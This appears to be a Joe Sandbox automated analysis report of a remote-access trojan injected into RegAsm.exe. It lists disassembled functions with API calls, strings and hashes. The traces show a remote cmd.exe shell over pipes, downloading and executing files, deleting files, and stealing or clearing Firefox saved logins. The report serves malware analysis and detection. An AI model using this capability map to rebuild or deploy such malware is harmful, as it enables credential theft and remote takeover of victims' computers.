String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: a9d4ec1c28e949222569c7cdcf8c37c729a4468b9ecae551f0147a98f0a931c4
Instruction ID: cc572a4a7b8cc2dd4c8a1b63f7d6ff9f2a059f33d68be0fa136a37d341ce95d8
Opcode Fuzzy Hash: a9d4ec1c28e949222569c7cdcf8c37c729a4468b9ecae551f0147a98f0a931c4
Instruction Fuzzy Hash: CB41E531B10201B7DB147BBA891F96D7A26AB82309B40412FEC01276D3EA7D9D1987DF

Function 00401C4F Relevance: 18.1, APIs: 12, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C59
SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C68
CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C71
closesocket.WS2_32(000000FF), ref: 00401C7F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401CB6
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CCB
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401CD2
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CE7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CF1
SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401CFE
CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401D03

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: f497eed2d3fc3337d417e3aefa93303116c875cddcb4f4683ac269fad97ca0d7
Instruction ID: 647261f9900fe491da89cb5d5ae73573130af4b1a9831dc02a6027ad4db015cc
Opcode Fuzzy Hash: f497eed2d3fc3337d417e3aefa93303116c875cddcb4f4683ac269fad97ca0d7
Instruction Fuzzy Hash: EA213B31544B01AFD7316F21ED09B1ABBA2FF41326F104A6DE0E611AF0CB75E851DB58

Function 004139A6 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000000,?,00000002,0040907E,WinDir,00000000,00000000), ref: 00414463

Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
Part of subcall function 0040D033: RegCloseKey.KERNEL32(?), ref: 0040D07F

StrToIntA.SHLWAPI(00000000,0045F27C,?,00000000,00000000,?,00467E5C,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 00413A1C

Strings

CurrentBuildNumber, xrefs: 004139FD
(64 bit), xrefs: 00413A48
ProductName, xrefs: 004139B5
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004139BA, 004139C4, 00413A02
(32 bit), xrefs: 00413A4F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: e279c73c5175a0df0bccc04d70c48d34f1762d2b2d67484434f5c33ee602fcd9
Instruction ID: 1917af8823246703e0b69b16f84be6404e949fb754efc197e49d965c963a868a
Opcode Fuzzy Hash: e279c73c5175a0df0bccc04d70c48d34f1762d2b2d67484434f5c33ee602fcd9
Instruction Fuzzy Hash: B01106B0A402405AC600F7A59D4BAAFB7589B44309F94017FFA45A31D3EAAD1D8D82AF

Function 0043C698 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00432251,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043C69D
_free.LIBCMT ref: 0043C6D2
_free.LIBCMT ref: 0043C6F9
SetLastError.KERNEL32(00000000), ref: 0043C706
SetLastError.KERNEL32(00000000), ref: 0043C70F

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0043C69C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 3170660625-1068371695
Opcode ID: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
Instruction ID: bc4159b708f5a4293034d87da73aa0aa4050a2000ac7bf9c59918bad1b3ef628
Opcode Fuzzy Hash: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
Instruction Fuzzy Hash: E101DB7554460167861167766CCAD6B175AABDA3A9F20202BFD15B2292EB6CCC01431D

Function 0040D202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D239
RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D244

Strings

5.2.0 Light, xrefs: 0040D206

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: 5.2.0 Light
API String ID: 1818849710-1277417835
Opcode ID: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
Instruction ID: ebd1829d961e48a05cccc46ad5987234d1f606a9772c4a5001abe3e09c24b449
Opcode Fuzzy Hash: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
Instruction Fuzzy Hash: 8FF0F632800108FBCB00AFA0DD05EEE776CEF04304F10417ABE09A6091D6359E08DA58

Function 0040CF8C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,time,?,?,0040931D,time), ref: 0040CFA3
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040931D,time), ref: 0040CFB7
RegCloseKey.KERNEL32(?,?,?,0040931D,time), ref: 0040CFC2

Strings

time, xrefs: 0040CF90

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: time
API String ID: 3677997916-1872009285
Opcode ID: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
Instruction ID: 01e9e4454c5815cd9fe83fd72c8224fe9163c15e3a8ae46bcaeb397ef7d6e021
Opcode Fuzzy Hash: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
Instruction Fuzzy Hash: FDE06D36901238FBDB204BA29D4DDEB7F6DDF477A4F010265BD08A2151D2354E10E6E5

Function 0040D033 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
RegCloseKey.KERNEL32(?), ref: 0040D07F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
Instruction ID: d1556b6a21c4095f6825b550070d3a1ea107f6ab0172e99dcae801f88fb81ba0
Opcode Fuzzy Hash: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
Instruction Fuzzy Hash: A301A27A900128BBCB209B91DC48DEFBB7DDB85354F000166BB09B3140DA348E1A97A8

Function 0040CFD6 Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
RegCloseKey.KERNEL32(?), ref: 0040D01F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
Instruction ID: fb118fa7efbfe96847db450d91ab692ef4bc3c1656726d9dc2d007ede4cac492
Opcode Fuzzy Hash: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
Instruction Fuzzy Hash: F2F01D76D00218BFDF109FE09C05FEE7BBCEB05714F1041A5FA08E6191D6355A159B94

Function 0040D310 Relevance: 4.5, APIs: 3, Instructions: 30
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D31E
RegSetValueExA.KERNEL32(?,00000004,00000000,00000004,?,00000004,?,?,?,00408639,00459A08,00000001), ref: 0040D339
RegCloseKey.ADVAPI32(?,?,?,?,00408639,00459A08,00000001), ref: 0040D344

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
Instruction ID: 70c1ac6059dc5b3d9a0709b10961866a60481b6b1b62c8df2f439cbbf28fa7e5
Opcode Fuzzy Hash: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
Instruction Fuzzy Hash: F7E06D76900208FBDF109FE09C06FEA7B6CEF05B54F104165BF08A7190D2359E18E7A9

Function 0043B627 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043B648

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

RtlReAllocateHeap.NTDLL(00000000,00000048,00426BC1,00426BC2,00000006,?,0042A8FC,C985C35D,00000006,004274BC,00426BC2,00000008,004278A7,00000008,00426BC2,00427818), ref: 0043B684

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: c49c117e4ca7361ac0314f882396d4a2d3c3e32dd118628cb6b083a4c3ef1095
Instruction ID: fe16a153650bf957c02c75a4bda108abfe66e8103c26be9158aaf2df18b8f7a5
Opcode Fuzzy Hash: c49c117e4ca7361ac0314f882396d4a2d3c3e32dd118628cb6b083a4c3ef1095
Instruction Fuzzy Hash: 81F0C83160060466DB212B26AC07F6B3758DFD9774F14612BFB14662A2EF2CD80185DF

Function 00401673 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00401698
CreateEventW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001,00000000,?,0040157C), ref: 004016D4

Part of subcall function 004016E4: WSAStartup.WS2_32(00000202,00000000), ref: 004016F9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
Instruction ID: ee37118afe77b65253b8e33a0694ca72e24623c2f1becaa2fb2072e3896651ba
Opcode Fuzzy Hash: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
Instruction Fuzzy Hash: CF017171404B809FD7358F79A8856867FE0AB16304F084E6EF4D693BA1D3B1A841CF19

Function 004087EF Relevance: 3.0, APIs: 2, Instructions: 12synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040A324,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 004087FE
GetLastError.KERNEL32 ref: 00408804

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
Instruction ID: d80e09737745f7bf6ee3eddf50bc73956995b70806c11dd9ed117efe7a266b7c
Opcode Fuzzy Hash: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
Instruction Fuzzy Hash: 26C08C787942005BE70923609D8EB2C2440EB48707F10807AF203D40D0CBD48840852A

Function 0041ED95 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0041EE6D: recv.WS2_32(?,?,?,?), ref: 0041EE78

WSAGetLastError.WS2_32 ref: 0041EDB7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
Instruction ID: faf68b5ff96845e0976cbf32cc890fde9b2ffc12f7c1b339871521fb39d3c049
Opcode Fuzzy Hash: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
Instruction Fuzzy Hash: FCF0A43920C1165BDF18A55AFC948F933569B49334B30472BFD39825F0DA2998D11109

Function 0043AF95 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0043C6C9,00000001,00000364,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043AFD6

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
Instruction ID: a7c765c1dc6197512c48bfc0f123c91e67cad64699951c3927080ceb2c5ec14d
Opcode Fuzzy Hash: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
Instruction Fuzzy Hash: 26F0597168462467DF246B23CD01E5F7748AF497B0F246123F898A7280EB38DC2186AF

Function 0041EE06 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0041EE86: send.WS2_32(?,?,?,?), ref: 0041EE91

WSAGetLastError.WS2_32 ref: 0041EE28

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
Instruction ID: 51c8cce08e66605cdbda4daed835d51d1109a6a45c2cb2692f3426c1110deaf5
Opcode Fuzzy Hash: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
Instruction Fuzzy Hash: BEF0963E20C3169ADE28995BE8548BA33519F49330F30471BFE3A866F0DA2868D05549

Function 004016E4 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004016F9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
Instruction ID: 255de9a7584d5d18edeb06657e72cc98f651a1ca3ec2e3fd9487ec56659a492e
Opcode Fuzzy Hash: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
Instruction Fuzzy Hash: 4BD0123395864C4ED610AFB9AC0F9A4775CD313611F0003BAADB5835D6F640161CC7EB

Function 0041EE86 Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0041EE91

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
Instruction ID: 219120072e52f96b3a762e6ed3faccd779c965bd914e66b4b009d712158f5d27
Opcode Fuzzy Hash: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
Instruction Fuzzy Hash: A0C04C79104108BB9B051BA19C0CD797B69D749651B00C425B90555150D577991196A5

Non-executed Functions

Function 0040F4A7 Relevance: 63.9, APIs: 31, Strings: 5, Instructions: 929COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040F4C9
GetTickCount.KERNEL32 ref: 0040F543

Strings

hlight, xrefs: 00410523
SetSuspendState, xrefs: 0040FCAA
PowrProf.dll, xrefs: 0040FCAF
}F, xrefs: 0041046C
X|F, xrefs: 0040F4F8

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: }F$PowrProf.dll$SetSuspendState$X|F$hlight
API String ID: 180926312-747135334
Opcode ID: bd791beb00660d74d78a248b85cbe22f1df0740ae6a73fc17567db0fc55dc88d
Instruction ID: 98c374b66c36bac6561f19394a83ab35c3f0051b20c4d30e97aa66e57c35150d
Opcode Fuzzy Hash: bd791beb00660d74d78a248b85cbe22f1df0740ae6a73fc17567db0fc55dc88d
Instruction Fuzzy Hash: B452D53161430067C615FB72CC5AAAE369A9F90709F00493FF646B71D2EEBC8A49C75E

Function 0040511A Relevance: 35.8, APIs: 10, Strings: 10, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040513C
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 0040520A
DeleteFileW.KERNEL32(00000000), ref: 0040522C

Part of subcall function 00414795: FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
Part of subcall function 00414795: FindNextFileW.KERNEL32(00000000,?), ref: 00414863
Part of subcall function 00414795: RemoveDirectoryW.KERNEL32(?), ref: 004148DD

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

Part of subcall function 004018E7: WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000), ref: 0040196B
Part of subcall function 004018E7: SetEvent.KERNEL32(?), ref: 00401999

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405619
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004056FA
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00405946
DeleteFileA.KERNEL32(?), ref: 00405AD4

Part of subcall function 00405C8E: __EH_prolog.LIBCMT ref: 00405C93
Part of subcall function 00405C8E: FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
Part of subcall function 00405C8E: __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
Part of subcall function 00405C8E: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81

Sleep.KERNEL32(000007D0), ref: 00405B7A
StrToIntA.SHLWAPI(00000000,00000000), ref: 00405BBC

Part of subcall function 00414D7F: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74

Strings

open, xrefs: 00405613
Deleted file: , xrefs: 0040524B
Browsing directory: , xrefs: 004056BA
Unable to delete: , xrefs: 0040528A
Downloading file: , xrefs: 004053FF
Failed to download file: , xrefs: 00405527
Executing file: , xrefs: 0040562F
X|F, xrefs: 00405168
Unable to rename file!, xrefs: 00405895
Downloaded file: , xrefs: 004054B0

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteEventFirstNext$DirectoryDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersRemoveShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$X|F$open
API String ID: 577278831-3555090288
Opcode ID: 96227b8e189f7fdcadea00c127325455557f538216e4e652d0f401818db13fc1
Instruction ID: 248697d8118448b10e373b0070428f50d3d60723a4b6fa8bdee278dac68b1eb1
Opcode Fuzzy Hash: 96227b8e189f7fdcadea00c127325455557f538216e4e652d0f401818db13fc1
Instruction Fuzzy Hash: 2942AF716143006BC604FB76CD5B9AF76A9AF91308F40093FF646671D2EE7C9A0C879A

Function 00403B0B Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 275pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00403B5D

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

__Init_thread_footer.LIBCMT ref: 00403B9A
CreatePipe.KERNEL32(004697C4,004697AC,004696D0,00000000,004595AC,00000000), ref: 00403C28
CreatePipe.KERNEL32(004697B0,004697CC,004696D0,00000000), ref: 00403C42
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,004696E0,004697B4), ref: 00403CB8
Sleep.KERNEL32(0000012C), ref: 00403D0F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403D32
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00403D5C
WriteFile.KERNEL32(00000000,00000000,?,00000000,00467D08,004595B0), ref: 00403E5C

Part of subcall function 0042BE7E: __onexit.LIBCMT ref: 0042BE84

Sleep.KERNEL32(00000064), ref: 00403E78
TerminateProcess.KERNEL32(00000000), ref: 00403E91
CloseHandle.KERNEL32 ref: 00403E9D
CloseHandle.KERNEL32 ref: 00403EA5
CloseHandle.KERNEL32 ref: 00403EB7
CloseHandle.KERNEL32 ref: 00403EBF

Strings

cmd.exe, xrefs: 00403BBD
SystemDrive, xrefs: 00403BD4

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: a2e0625ca6f411f7efb066e01ea8d05623e5cf75442ca6f623990c6e8f78e4cc
Instruction ID: f800c9f0f2bf78fedcc34e7f916c989ee22e489b26dcc0f87d11f274eef4dc79
Opcode Fuzzy Hash: a2e0625ca6f411f7efb066e01ea8d05623e5cf75442ca6f623990c6e8f78e4cc
Instruction Fuzzy Hash: 9B919071A10214EBDB01AFA5ED469AD3B6DEB44706B04003BF501B72E1EBF95E04CB9E

Function 00407FDE Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040805D
FindClose.KERNEL32(00000000), ref: 00408077
FindNextFileA.KERNEL32(00000000,?), ref: 004081AE
FindClose.KERNEL32(00000000), ref: 004081D4

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 00408000
[Firefox StoredLogins not found], xrefs: 00408082
UserProfile, xrefs: 0040800E
\logins.json, xrefs: 004080F6
[Firefox StoredLogins Cleared!], xrefs: 004081C1
\key3.db, xrefs: 00408138

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 71a3758c9da8e09f58d85f82c6f0c0c7b393f4ae15ed837ff10422e77743f24a
Instruction ID: 77c5650d51b0fe3478d1e8891f5765647e4bb1e207f3f9250e523ff0b76e5811
Opcode Fuzzy Hash: 71a3758c9da8e09f58d85f82c6f0c0c7b393f4ae15ed837ff10422e77743f24a
Instruction Fuzzy Hash: 205193309101199ECB14FB71DE5ADEEB734AF21308F10017FE646761D2EFB85A4ACA59

Function 004081F9 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 00408271
FindClose.KERNEL32(00000000), ref: 00408287
FindNextFileA.KERNEL32(00000000,?), ref: 004082B1
DeleteFileA.KERNEL32(00000000,00000000), ref: 00408359
GetLastError.KERNEL32 ref: 00408363
FindNextFileA.KERNEL32(00000000,00000010), ref: 00408377
FindClose.KERNEL32(00000000), ref: 0040839D
FindClose.KERNEL32(00000000), ref: 004083BE

Strings

